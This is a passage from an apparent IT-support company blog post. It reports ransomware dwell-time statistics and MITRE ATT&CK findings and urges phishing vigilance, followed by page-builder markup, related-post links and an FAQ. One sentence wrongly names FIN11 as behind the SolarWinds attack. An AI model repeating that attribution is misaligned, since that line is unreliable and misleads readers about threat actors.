Interestingly, the median global dwell time was just 5 days for ransomware, and 45 days for non-ransomware investigations. Overall, the global median dwell time has decreased constantly over the past decade, from 416 days in 2011 to 24 in 2020. New extortion techniques used by ransomware gangs are also noted in the data. The popular phishing and extortion campaigns conducted by a cybercrime group named FIN11, the threat group behind the SolarWinds supply chain attack, and malicious actors shifting focus to systems that support remote work. In terms of attack tactics, it was found that attackers used 63% of ‘MITRE ATT&CK’ techniques and 24 percent of sub- techniques throughout the analysed time frame. However, the company said, just 37% of the techniques observed (23% of all techniques) were seen in more than 5% of the intrusions it investigated.

Neuways advises businesses to be constantly aware of the threat of phishing campaigns, ransomware and cyber criminals. The rise of ransomware is often attributed to the amount of chaos and disruption that businesses have gone through over the last 12 months, between an increase in remote working and national lockdowns. As the UK emerges out of lockdown, businesses must prepare themselves for a continuation of ransomware-filled phishing campaigns – employees should remain vigilant when answering emails in their inboxes or phone numbers, that they are not falling victim to cyber criminals aiming to extort them for their company’s money.

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container][fusion_builder_container type=”flex” hundred_percent=”no” hundred_percent_height=”no” hundred_percent_height_scroll=”no” align_content=”stretch” flex_align_items=”flex-start” flex_justify_content=”flex-start” hundred_percent_height_center_content=”yes” equal_height_columns=”no” container_tag=”div” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” status=”published” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”center center” background_repeat=”no-repeat” fade=”no” background_parallax=”none” enable_mobile=”no” parallax_speed=”0.3″ background_blend_mode=”none” video_aspect_ratio=”16:9″ video_loop=”yes” video_mute=”yes” absolute=”off” absolute_devices=”small,medium,large” sticky=”off” sticky_devices=”small-visibility,medium-visibility,large-visibility” sticky_transition_offset=”0″ scroll_offset=”0″ animation_direction=”left” animation_speed=”0.3″ filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″][fusion_builder_row][fusion_builder_column type=”1_1″ type=”1_1″ layout=”1_1″ align_self=”auto” content_layout=”column” align_content=”flex-start” valign_content=”flex-start” content_wrap=”wrap” center_content=”no” target=”_self” hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky” order_medium=”0″ order_small=”0″ margin_top=”22px” hover_type=”none” border_style=”solid” box_shadow=”no” box_shadow_blur=”0″ box_shadow_spread=”0″ background_type=”single” gradient_start_position=”0″ gradient_end_position=”100″ gradient_type=”linear” radial_direction=”center center” linear_angle=”180″ background_position=”left top” background_repeat=”no-repeat” background_blend_mode=”none” filter_type=”regular” filter_hue=”0″ filter_saturation=”100″ filter_brightness=”100″ filter_contrast=”100″ filter_invert=”0″ filter_sepia=”0″ filter_opacity=”100″ filter_blur=”0″ filter_hue_hover=”0″ filter_saturation_hover=”100″ filter_brightness_hover=”100″ filter_contrast_hover=”100″ filter_invert_hover=”0″ filter_sepia_hover=”0″ filter_opacity_hover=”100″ filter_blur_hover=”0″ animation_direction=”left” animation_speed=”0.3″ last=”true” border_position=”all” first=”true” min_height=”” link=””][fusion_text rule_style=”default” animation_direction=”left” animation_speed=”0.3″ hide_on_mobile=”small-visibility,medium-visibility,large-visibility” sticky_display=”normal,sticky”]

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.

[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]

Want to keep up with our blog?

Get our most valuable tips right inside your inbox, once per month!

Latest IT News & Insights
Phishing Awareness Training
How To React To The Rise In Quality of Phishing Attacks
Be Cybersafe, stay informed, stay vigilant, and let Neuways help you build a strong and secure defence...
Read More
IT Support issues can be resolved by working with companies like Neuways
IT Support issue caused Cornwall Hospital Disruption - Not Cyber Attack
IT Support issues - It's all about backup protocols. These Issues caused disruption in Cornwall. but...
Read More
Neuways explain how to help move IT offices seamlessly.
How to seamlessly move offices without your IT being affected
Moving offices as a business does not have to be complicated. Make life easier for your team by enlisting...
Read More
Choose Neuways for your IT Support, Cyber Security and Business Central needs.
Become Cybersafe: Listen to our Cybersafe Digest Podcast
As leaders of businesses and companies, the weight of safeguarding your company’s assets, reputation,...
Read More
Use a password manager tool like the ones recommended from Neuways
Best thing about using a Password Manager tool
When using a password manager tool, you can store all your login details in one accessible place. It's...
Read More
Cyber Security Representation
The Critical Need for Businesses to Strengthen Cyber Security in the Age of AI
Businesses must take note of the dangers of AI and Cyber Security. In our latest blog we explain the...
Read More
IT Support in Derby from Neuways
What Questions should you be asking your IT Support Provider?
Choosing the right managed IT service provider (MSP) is crucial for your business’s success, and...
Read More
Microsoft Dynamics 365 Business Central Main Product Mockup Showcase ERP
Why Business Central enhances and streamlines solutions
See how Microsoft Dynamics 365 Business Central enhances business solutions and streamlines the processes...
Read More

Frequently Asked Questions

As a leading IT and technology provider, we offer three core services, all of which have additional add-ons. We offer Managed IT Support, Business Central implementation and consultation, as well as Managed Cyber Security. Call us on 01283 753333 if you are interested in any of our services.

Contact us

Support: 01283 753300

Business Development: 01283 753333

Purchasing: 01283 753322

Admin and Accounts: 01283 753311

Email: hello@neuways.com

Managed IT support is a comprehensive solution where an expert IT provider, like Neuways, handles your technology infrastructure. This includes proactive monitoring, maintenance, cyber security, and support.

Yes we do. Your business needs Cyber Security due to the increasing number of cyber threats that are affecting businesses in all industries. If your business has data and technology systems implemented, you will need Managed Cyber Security.

Yes we can. We have our own dedicated Microsoft Dynamics 365 Business Central teams who work to ensure that we can implement the right systems and solutions into your website that are absolute right for you. 

Exclaimer Pro is a dynamic email signature that helps clients to switch and change around email signatures so that clients are able to advertise different offers and brands to a variety of email recipients. Administrators can also manage user emails internally, meaning the user does not have to touch their own email signature.

We offer Managed Security Training to help employees spot email phishing attacks, spear phishing attacks and vishing attacks. We also help train clients on how to use the various pieces of software we provide to clients, like Exclaimer Pro, Business Central and Cybersafe software.

We are a Managed IT Support provider based in Derby, East Midlands. However, we cover so many areas including the whole of the UK, Europe, and America. We are always willing to travel and send our expert technicians to ensure you have the best experience. 

Got a question?

Reach out
& Connect

Please enable JavaScript in your browser to complete this form.
Name